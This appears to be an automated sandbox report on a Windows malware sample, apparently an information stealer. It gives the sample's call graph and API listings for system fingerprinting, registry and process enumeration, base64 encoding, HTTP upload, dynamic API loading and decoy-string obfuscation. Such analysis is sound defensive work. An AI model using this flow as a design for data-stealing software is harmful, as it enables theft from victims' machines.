15071->15072 15073 721fef 15072->15073 15074 72a8a0 lstrcpy 15073->15074 15075 721ff8 15074->15075 15701 727d80 GetSystemPowerStatus 15075->15701 15078 72a9b0 4 API calls 15079 722018 15078->15079 15080 72a8a0 lstrcpy 15079->15080 15081 722021 15080->15081 15082 72a9b0 4 API calls 15081->15082 15083 722040 15082->15083 15084 72a8a0 lstrcpy 15083->15084 15085 722049 15084->15085 15086 72a9b0 4 API calls 15085->15086 15087 72206a 15086->15087 15088 72a8a0 lstrcpy 15087->15088 15089 722073 15088->15089 15090 72207e GetCurrentProcessId 15089->15090 15703 729470 OpenProcess 15090->15703 15093 72a920 3 API calls 15094 7220a4 15093->15094 15095 72a8a0 lstrcpy 15094->15095 15096 7220ad 15095->15096 15097 72a9b0 4 API calls 15096->15097 15098 7220d7 15097->15098 15099 72a8a0 lstrcpy 15098->15099 15100 7220e0 15099->15100 15101 72a9b0 4 API calls 15100->15101 15102 722100 15101->15102 15103 72a8a0 lstrcpy 15102->15103 15104 722109 15103->15104 15708 727e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15104->15708 15107 72a9b0 4 API calls 15108 722129 15107->15108 15109 72a8a0 lstrcpy 15108->15109 15110 722132 15109->15110 15111 72a9b0 4 API calls 15110->15111 15112 722151 15111->15112 15113 72a8a0 lstrcpy 15112->15113 15114 72215a 15113->15114 15115 72a9b0 4 API calls 15114->15115 15116 72217b 15115->15116 15117 72a8a0 lstrcpy 15116->15117 15118 722184 15117->15118 15712 727f60 15118->15712 15121 72a9b0 4 API calls 15122 7221a4 15121->15122 15123 72a8a0 lstrcpy 15122->15123 15124 7221ad 15123->15124 15125 72a9b0 4 API calls 15124->15125 15126 7221cc 15125->15126 15127 72a8a0 lstrcpy 15126->15127 15128 7221d5 15127->15128 15129 72a9b0 4 API calls 15128->15129 15130 7221f6 15129->15130 15131 72a8a0 lstrcpy 15130->15131 15132 7221ff 15131->15132 15725 727ed0 GetSystemInfo wsprintfA 15132->15725 15135 72a9b0 4 API calls 15136 72221f 15135->15136 15137 72a8a0 lstrcpy 15136->15137 15138 722228 15137->15138 15139 72a9b0 4 API calls 15138->15139 15140 722247 15139->15140 15141 72a8a0 lstrcpy 15140->15141 15142 722250 15141->15142 15143 72a9b0 4 API calls 15142->15143 15144 722270 15143->15144 15145 72a8a0 lstrcpy 15144->15145 15146 722279 15145->15146 15727 728100 GetProcessHeap RtlAllocateHeap 15146->15727 15149 72a9b0 4 API calls 15150 722299 15149->15150 15151 72a8a0 lstrcpy 15150->15151 15152 7222a2 15151->15152 15153 72a9b0 4 API calls 15152->15153 15154 7222c1 15153->15154 15155 72a8a0 lstrcpy 15154->15155 15156 7222ca 15155->15156 15157 72a9b0 4 API calls 15156->15157 15158 7222eb 15157->15158 15159 72a8a0 lstrcpy 15158->15159 15160 7222f4 15159->15160 15733 7287c0 15160->15733 15163 72a920 3 API calls 15164 72231e 15163->15164 15165 72a8a0 lstrcpy 15164->15165 15166 722327 15165->15166 15167 72a9b0 4 API calls 15166->15167 15168 722351 15167->15168 15169 72a8a0 lstrcpy 15168->15169 15170 72235a 15169->15170 15171 72a9b0 4 API calls 15170->15171 15172 72237a 15171->15172 15173 72a8a0 lstrcpy 15172->15173 15174 722383 15173->15174 15175 72a9b0 4 API calls 15174->15175 15176 7223a2 15175->15176 15177 72a8a0 lstrcpy 15176->15177 15178 7223ab 15177->15178 15738 7281f0 15178->15738 15180 7223c2 15181 72a920 3 API calls 15180->15181 15182 7223d5 15181->15182 15183 72a8a0 lstrcpy 15182->15183 15184 7223de 15183->15184 15185 72a9b0 4 API calls 15184->15185 15186 72240a 15185->15186 15187 72a8a0 lstrcpy 15186->15187 15188 722413 15187->15188 15189 72a9b0 4 API calls 15188->15189 15190 722432 15189->15190 15191 72a8a0 lstrcpy 15190->15191 15192 72243b 15191->15192 15193 72a9b0 4 API calls 15192->15193 15194 72245c 15193->15194 15195 72a8a0 lstrcpy 15194->15195 15196 722465 15195->15196 15197 72a9b0 4 API calls 15196->15197 15198 722484 15197->15198 15199 72a8a0 lstrcpy 15198->15199 15200 72248d 15199->15200 15201 72a9b0 4 API calls 15200->15201 15202 7224ae 15201->15202 15203 72a8a0 lstrcpy 15202->15203 15204 7224b7 15203->15204 15746 728320 15204->15746 15206 7224d3 15207 72a920 3 API calls 15206->15207 15208 7224e6 15207->15208 15209 72a8a0 lstrcpy 15208->15209 15210 7224ef 15209->15210 15211 72a9b0 4 API calls 15210->15211 15212 722519 15211->15212 15213 72a8a0 lstrcpy 15212->15213 15214 722522 15213->15214 15215 72a9b0 4 API calls 15214->15215 15216 722543 15215->15216 15217 72a8a0 lstrcpy 15216->15217 15218 72254c 15217->15218 15219 728320 17 API calls 15218->15219 15220 722568 15219->15220 15221 72a920 3 API calls 15220->15221 15222 72257b 15221->15222 15223 72a8a0 lstrcpy 15222->15223 15224 722584 15223->15224 15225 72a9b0 4 API calls 15224->15225 15226 7225ae 15225->15226 15227 72a8a0 lstrcpy 15226->15227 15228 7225b7 15227->15228 15229 72a9b0 4 API calls 15228->15229 15230 7225d6 15229->15230 15231 72a8a0 lstrcpy 15230->15231 15232 7225df 15231->15232 15233 72a9b0 4 API calls 15232->15233 15234 722600 15233->15234 15235 72a8a0 lstrcpy 15234->15235 15236 722609 15235->15236 15782 728680 15236->15782 15238 722620 15239 72a920 3 API calls 15238->15239 15240 722633 15239->15240 15241 72a8a0 lstrcpy 15240->15241 15242 72263c 15241->15242 15243 72265a lstrlen 15242->15243 15244 72266a 15243->15244 15245 72a740 lstrcpy 15244->15245 15246 72267c 15245->15246 15247 711590 lstrcpy 15246->15247 15248 72268d 15247->15248 15792 725190 15248->15792 15250 722699 15250->13682 15980 72aad0 15251->15980 15253 715009 InternetOpenUrlA 15254 715021 15253->15254 15255 7150a0 InternetCloseHandle InternetCloseHandle 15254->15255 15256 71502a InternetReadFile 15254->15256 15257 7150ec 15255->15257 15256->15254 15257->13686 15981 7198d0 15258->15981 15260 720759 15261 720a38 15260->15261 15262 72077d 15260->15262 15263 711590 lstrcpy 15261->15263 15265 720799 StrCmpCA 15262->15265 15264 720a49 15263->15264 16157 720250 15264->16157 15267 7207a8 15265->15267 15292 720843 15265->15292 15269 72a7a0 lstrcpy 15267->15269 15271 7207c3 15269->15271 15270 720865 StrCmpCA 15272 720874 15270->15272 15310 72096b 15270->15310 15273 711590 lstrcpy 15271->15273 15274 72a740 lstrcpy 15272->15274 15275 72080c 15273->15275 15278 720881 15274->15278 15276 72a7a0 lstrcpy 15275->15276 15279 720823 15276->15279 15277 72099c StrCmpCA 15280 7209ab 15277->15280 15299 720a2d 15277->15299 15281 72a9b0 4 API calls 15278->15281 15282 72a7a0 lstrcpy 15279->15282 15283 711590 lstrcpy 15280->15283 15284 7208ac 15281->15284 15285 72083e 15282->15285 15286 7209f4 15283->15286 15287 72a920 3 API calls 15284->15287 15984 71fb00 15285->15984 15289 72a7a0 lstrcpy 15286->15289 15290 7208b3 15287->15290 15293 720a0d 15289->15293 15291 72a9b0 4 API calls 15290->15291 15294 7208ba 15291->15294 15292->15270 15295 72a7a0 lstrcpy 15293->15295 15297 72a8a0 lstrcpy 15294->15297 15296 720a28 15295->15296 16100 720030 15296->16100 15299->13690 15310->15277 15632 72a7a0 lstrcpy 15631->15632 15633 711683 15632->15633 15634 72a7a0 lstrcpy 15633->15634 15635 711695 15634->15635 15636 72a7a0 lstrcpy 15635->15636 15637 7116a7 15636->15637 15638 72a7a0 lstrcpy 15637->15638 15639 7115a3 15638->15639 15639->14513 15641 7147c6 15640->15641 15642 714838 lstrlen 15641->15642 15666 72aad0 15642->15666 15644 714848 InternetCrackUrlA 15645 714867 15644->15645 15645->14590 15647 72a740 lstrcpy 15646->15647 15648 728b74 15647->15648 15649 72a740 lstrcpy 15648->15649 15650 728b82 GetSystemTime 15649->15650 15653 728b99 15650->15653 15651 72a7a0 lstrcpy 15652 728bfc 15651->15652 15652->14605 15653->15651 15655 72a931 15654->15655 15656 72a988 15655->15656 15658 72a968 lstrcpy lstrcat 15655->15658 15657 72a7a0 lstrcpy 15656->15657 15659 72a994 15657->15659 15658->15656 15659->14608 15660->14723 15662 719af9 LocalAlloc 15661->15662 15663 714eee 15661->15663 15662->15663 15664 719b14 CryptStringToBinaryA 15662->15664 15663->14611 15663->14613 15664->15663 15665 719b39 LocalFree 15664->15665 15665->15663 15666->15644 15667->14733 15668->14874 15669->14876 15670->14884 15799 7277a0 15671->15799 15674 7276c6 RegOpenKeyExA 15676 7276e7 RegQueryValueExA 15674->15676 15677 727704 RegCloseKey 15674->15677 15675 721c1e 15675->14966 15676->15677 15677->15675 15679 721c99 15678->15679 15679->14980 15681 721e09 15680->15681 15681->15022 15683 721e84 15682->15683 15684 727a9a wsprintfA 15682->15684 15683->15036 15684->15683 15686 727b4d 15685->15686 15687 721efe 15685->15687 15806 728d20 LocalAlloc CharToOemW 15686->15806 15687->15050 15690 72a740 lstrcpy 15689->15690 15691 727bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15690->15691 15692 727c25 15691->15692 15693 727c46 GetLocaleInfoA 15692->15693 15694 727d18 15692->15694 15697 72a9b0 lstrcpy lstrlen lstrcpy lstrcat 15692->15697 15699 72a8a0 lstrcpy 15692->15699 15693->15692 15695 727d28 15694->15695 15696 727d1e LocalFree 15694->15696 15698 72a7a0 lstrcpy 15695->15698 15696->15695 15697->15692 15700 727d37 15698->15700 15699->15692 15700->15063 15702 722008 15701->15702 15702->15078 15704 729493 GetModuleFileNameExA CloseHandle 15703->15704 15705 7294b5 15703->15705 15704->15705 15706 72a740 lstrcpy 15705->15706 15707 722091 15706->15707 15707->15093 15709 722119 15708->15709 15710 727e68 RegQueryValueExA 15708->15710 15709->15107 15711 727e8e RegCloseKey 15710->15711 15711->15709 15713 727fb9 GetLogicalProcessorInformationEx 15712->15713 15714 727fd8 GetLastError 15713->15714 15715 728029 15713->15715 15722 727fe3 15714->15722 15723 728022 15714->15723 15718 7289f0 2 API calls 15715->15718 15720 72807b 15718->15720 15719 7289f0 2 API calls 15721 722194 15719->15721 15720->15723 15724 728084 wsprintfA 15720->15724 15721->15121 15722->15713 15722->15721 15807 7289f0 15722->15807 15810 728a10 GetProcessHeap RtlAllocateHeap 15722->15810 15723->15719 15723->15721 15724->15721 15726 72220f 15725->15726 15726->15135 15728 7289b0 15727->15728 15729 72814d GlobalMemoryStatusEx 15728->15729 15730 728163 __aulldiv 15729->15730 15731 72819b wsprintfA 15730->15731 15732 722289 15731->15732 15732->15149 15734 7287fb GetProcessHeap RtlAllocateHeap wsprintfA 15733->15734 15736 72a740 lstrcpy 15734->15736 15737 72230b 15736->15737 15737->15163 15739 72a740 lstrcpy 15738->15739 15745 728229 15739->15745 15740 728263 15741 72a7a0 lstrcpy 15740->15741 15743 7282dc 15741->15743 15742 72a9b0 lstrcpy lstrlen lstrcpy lstrcat 15742->15745 15743->15180 15744 72a8a0 lstrcpy 15744->15745 15745->15740 15745->15742 15745->15744 15747 72a740 lstrcpy 15746->15747 15748 72835c RegOpenKeyExA 15747->15748 15749 7283d0 15748->15749 15750 7283ae 15748->15750 15752 728613 RegCloseKey 15749->15752 15753 7283f8 RegEnumKeyExA 15749->15753 15751 72a7a0 lstrcpy 15750->15751 15762 7283bd 15751->15762 15756 72a7a0 lstrcpy 15752->15756 15754 72860e 15753->15754 15755 72843f wsprintfA RegOpenKeyExA 15753->15755 15754->15752 15757 7284c1 RegQueryValueExA 15755->15757 15758 728485 RegCloseKey RegCloseKey 15755->15758 15756->15762 15760 728601 RegCloseKey 15757->15760 15761 7284fa lstrlen 15757->15761 15759 72a7a0 lstrcpy 15758->15759 15759->15762 15760->15754 15761->15760 15763 728510 15761->15763 15762->15206 15764 72a9b0 4 API calls 15763->15764 15765 728527 15764->15765 15766 72a8a0 lstrcpy 15765->15766 15767 728533 15766->15767 15768 72a9b0 4 API calls 15767->15768 15769 728557 15768->15769 15770 72a8a0 lstrcpy 15769->15770 15771 728563 15770->15771 15772 72856e RegQueryValueExA 15771->15772 15772->15760 15773 7285a3 15772->15773 15774 72a9b0 4 API calls 15773->15774 15775 7285ba 15774->15775 15776 72a8a0 lstrcpy 15775->15776 15777 7285c6 15776->15777 15778 72a9b0 4 API calls 15777->15778 15779 7285ea 15778->15779 15780 72a8a0 lstrcpy 15779->15780 15781 7285f6 15780->15781 15781->15760 15783 72a740 lstrcpy 15782->15783 15784 7286bc CreateToolhelp32Snapshot Process32First 15783->15784 15785 7286e8 Process32Next 15784->15785 15786 72875d CloseHandle 15784->15786 15785->15786 15791 7286fd 15785->15791 15787 72a7a0 lstrcpy 15786->15787 15789 728776 15787->15789 15788 72a8a0 lstrcpy 15788->15791 15789->15238 15790 72a9b0 lstrcpy lstrlen lstrcpy lstrcat 15790->15791 15791->15785 15791->15788 15791->15790 15793 72a7a0 lstrcpy 15792->15793 15794 7251b5 15793->15794 15795 711590 lstrcpy 15794->15795 15796 7251c6 15795->15796 15811 715100 15796->15811 15798 7251cf 15798->15250 15802 727720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15799->15802 15801 7276b9 15801->15674 15801->15675 15803 727780 RegCloseKey 15802->15803 15804 727765 RegQueryValueExA 15802->15804 15805 727793 15803->15805 15804->15803 15805->15801 15806->15687 15808 7289f9 GetProcessHeap HeapFree 15807->15808 15809 728a0c 15807->15809 15808->15809 15809->15722 15810->15722 15812 72a7a0 lstrcpy 15811->15812 15813 715119 15812->15813 15814 7147b0 2 API calls 15813->15814 15815 715125 15814->15815 15971 728ea0 15815->15971 15817 715184 15818 715192 lstrlen 15817->15818 15819 7151a5 15818->15819 15820 728ea0 4 API calls 15819->15820 15821 7151b6 15820->15821 15822 72a740 lstrcpy 15821->15822 15823 7151c9 15822->15823 15824 72a740 lstrcpy 15823->15824 15825 7151d6 15824->15825 15826 72a740 lstrcpy 15825->15826 15827 7151e3 15826->15827 15828 72a740 lstrcpy 15827->15828 15829 7151f0 15828->15829 15830 72a740 lstrcpy 15829->15830 15831 7151fd InternetOpenA StrCmpCA 15830->15831 15832 71522f 15831->15832 15833 7158c4 InternetCloseHandle 15832->15833 15834 728b60 3 API calls 15832->15834 15841 7158d9 ctype 15833->15841 15835 71524e 15834->15835 15836 72a920 3 API calls 15835->15836 15837 715261 15836->15837 15838 72a8a0 lstrcpy 15837->15838 15839 71526a 15838->15839 15840 72a9b0 4 API calls 15839->15840 15842 7152ab 15840->15842 15844 72a7a0 lstrcpy 15841->15844 15843 72a920 3 API calls 15842->15843 15845 7152b2 15843->15845 15852 715913 15844->15852 15846 72a9b0 4 API calls 15845->15846 15847 7152b9 15846->15847 15848 72a8a0 lstrcpy 15847->15848 15849 7152c2 15848->15849 15850 72a9b0 4 API calls 15849->15850 15851 715303 15850->15851 15853 72a920 3 API calls 15851->15853 15852->15798 15854 71530a 15853->15854 15855 72a8a0 lstrcpy 15854->15855 15856 715313 15855->15856 15857 715329 InternetConnectA 15856->15857 15857->15833 15858 715359 HttpOpenRequestA 15857->15858 15860 7158b7 InternetCloseHandle 15858->15860 15861 7153b7 15858->15861 15860->15833 15862 72a9b0 4 API calls 15861->15862 15863 7153cb 15862->15863 15864 72a8a0 lstrcpy 15863->15864 15865 7153d4 15864->15865 15866 72a920 3 API calls 15865->15866 15867 7153f2 15866->15867 15868 72a8a0 lstrcpy 15867->15868 15869 7153fb 15868->15869 15870 72a9b0 4 API calls 15869->15870 15871 71541a 15870->15871 15872 72a8a0 lstrcpy 15871->15872 15873 715423 15872->15873 15874 72a9b0 4 API calls 15873->15874 15875 715444 15874->15875 15876 72a8a0 lstrcpy 15875->15876 15877 71544d 15876->15877 15878 72a9b0 4 API calls 15877->15878 15879 71546e 15878->15879 15880 72a8a0 lstrcpy 15879->15880 15972 728ead CryptBinaryToStringA 15971->15972 15976 728ea9 15971->15976 15973 728ece GetProcessHeap RtlAllocateHeap 15972->15973 15972->15976 15974 728ef4 ctype 15973->15974 15973->15976 15975 728f05 CryptBinaryToStringA 15974->15975 15975->15976 15976->15817 15980->15253 16223 719880 15981->16223 15983 7198e1 15983->15260 15985 72a740 lstrcpy 15984->15985 15986 71fb16 15985->15986 16158 72a740 lstrcpy 16157->16158 16159 720266 16158->16159 16160 728de0 2 API calls 16159->16160 16161 72027b 16160->16161 16162 72a920 3 API calls 16161->16162 16163 72028b 16162->16163 16164 72a8a0 lstrcpy 16163->16164 16165 720294 16164->16165 16166 72a9b0 4 API calls 16165->16166 16167 7202b8 16166->16167 16224 71988d 16223->16224 16227 716fb0 16224->16227 16226 7198ad ctype 16226->15983 16230 716d40 16227->16230 16231 716d63 16230->16231 16243 716d59 16230->16243 16231->16243 16244 716660 16231->16244 16233 716dbe 16233->16243 16250 7169b0 16233->16250 16235 716e2a 16236 716ee6 VirtualFree 16235->16236 16238 716ef7 16235->16238 16235->16243 16236->16238 16237 716f41 16241 7289f0 2 API calls 16237->16241 16237->16243 16238->16237 16239 716f26 FreeLibrary 16238->16239 16240 716f38 16238->16240 16239->16238 16242 7289f0 2 API calls 16240->16242 16241->16243 16242->16237 16243->16226 16245 71668f VirtualAlloc 16244->16245 16247 716730 16245->16247 16249 71673c 16245->16249 16248 716743 VirtualAlloc 16247->16248 16247->16249 16248->16249 16249->16233 16251 7169c9 16250->16251 16255 7169d5 16250->16255 16252 716a09 LoadLibraryA 16251->16252 16251->16255 16253 716a32 16252->16253 16252->16255 16257 716ae0 16253->16257 16260 728a10 GetProcessHeap RtlAllocateHeap 16253->16260 16255->16235 16256 716ba8 GetProcAddress 16256->16255 16256->16257 16257->16255 16257->16256 16258 7289f0 2 API calls 16258->16257 16259 716a8b 16259->16255 16259->16258 16260->16259

                                  Executed Functions

                                  Function 00729860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 729860-729874 call 729750 663 729a93-729af2 LoadLibraryA * 5 660->663 664 72987a-729a8e call 729780 GetProcAddress * 21 660->664 666 729af4-729b08 GetProcAddress 663->666 667 729b0d-729b14 663->667 664->663 666->667 669 729b46-729b4d 667->669 670 729b16-729b41 GetProcAddress * 2 667->670 671 729b68-729b6f 669->671 672 729b4f-729b63 GetProcAddress 669->672 670->669 673 729b71-729b84 GetProcAddress 671->673 674 729b89-729b90 671->674 672->671 673->674 675 729b92-729bbc GetProcAddress * 2 674->675 676 729bc1-729bc2 674->676 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01222FF0), ref: 007298A1
                                  • GetProcAddress.KERNEL32(74DD0000,01222F00), ref: 007298BA
                                  • GetProcAddress.KERNEL32(74DD0000,01222ED0), ref: 007298D2
                                  • GetProcAddress.KERNEL32(74DD0000,01222DB0), ref: 007298EA
                                  • GetProcAddress.KERNEL32(74DD0000,01222E70), ref: 00729903
                                  • GetProcAddress.KERNEL32(74DD0000,01229B90), ref: 0072991B
                                  • GetProcAddress.KERNEL32(74DD0000,01217580), ref: 00729933
                                  • GetProcAddress.KERNEL32(74DD0000,012174C0), ref: 0072994C
                                  • GetProcAddress.KERNEL32(74DD0000,01222E28), ref: 00729964
                                  • GetProcAddress.KERNEL32(74DD0000,01222D50), ref: 0072997C
                                  • GetProcAddress.KERNEL32(74DD0000,01222D68), ref: 00729995
                                  • GetProcAddress.KERNEL32(74DD0000,01222E88), ref: 007299AD
                                  • GetProcAddress.KERNEL32(74DD0000,01217660), ref: 007299C5
                                  • GetProcAddress.KERNEL32(74DD0000,01222EB8), ref: 007299DE
                                  • GetProcAddress.KERNEL32(74DD0000,01222EE8), ref: 007299F6
                                  • GetProcAddress.KERNEL32(74DD0000,01217640), ref: 00729A0E
                                  • GetProcAddress.KERNEL32(74DD0000,01222DF8), ref: 00729A27
                                  • GetProcAddress.KERNEL32(74DD0000,01222DC8), ref: 00729A3F
                                  • GetProcAddress.KERNEL32(74DD0000,01217680), ref: 00729A57
                                  • GetProcAddress.KERNEL32(74DD0000,01222DE0), ref: 00729A70
                                  • GetProcAddress.KERNEL32(74DD0000,012175E0), ref: 00729A88
                                  • LoadLibraryA.KERNEL32(01223080,?,00726A00), ref: 00729A9A
                                  • LoadLibraryA.KERNEL32(01223050,?,00726A00), ref: 00729AAB
                                  • LoadLibraryA.KERNEL32(01223098,?,00726A00), ref: 00729ABD
                                  • LoadLibraryA.KERNEL32(012230B0,?,00726A00), ref: 00729ACF
                                  • LoadLibraryA.KERNEL32(01223068,?,00726A00), ref: 00729AE0
                                  • GetProcAddress.KERNEL32(75A70000,012230C8), ref: 00729B02
                                  • GetProcAddress.KERNEL32(75290000,012230E0), ref: 00729B23
                                  • GetProcAddress.KERNEL32(75290000,012230F8), ref: 00729B3B
                                  • GetProcAddress.KERNEL32(75BD0000,01223110), ref: 00729B5D
                                  • GetProcAddress.KERNEL32(75450000,01217520), ref: 00729B7E
                                  • GetProcAddress.KERNEL32(76E90000,01229BB0), ref: 00729B9F
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00729BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00729BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: f006e1234385cfe8f5501755cbd4af1c30ffc1b7bc3d8fe0441ab772db8b4845
                                  • Instruction ID: f183cd7b489de1ada0069daf7cafb894a5b1805816db5dae1ef44bbe0978c5fb
                                  • Opcode Fuzzy Hash: f006e1234385cfe8f5501755cbd4af1c30ffc1b7bc3d8fe0441ab772db8b4845
                                  • Instruction Fuzzy Hash: 44A13BB5938344AFD344EFAAFD889663BF9F74C303704471AA705C3264D6399841EB5A
                                  Function 007145C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 7145c0-714695 RtlAllocateHeap 781 7146a0-7146a6 764->781 782 7146ac-71474a 781->782 783 71474f-7147a9 VirtualProtect 781->783 782->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0071460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0071479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007146B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007145F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007146CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007146C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007145D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007145C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007146AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007146D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007145DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0071473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00714662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007145E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmpDownload File
